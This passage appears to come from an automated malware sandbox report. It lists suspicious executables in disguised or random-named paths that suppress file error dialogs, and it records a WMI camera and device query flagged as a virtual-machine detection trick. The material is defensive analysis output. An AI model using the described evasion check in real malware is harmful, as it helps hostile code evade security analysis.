                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
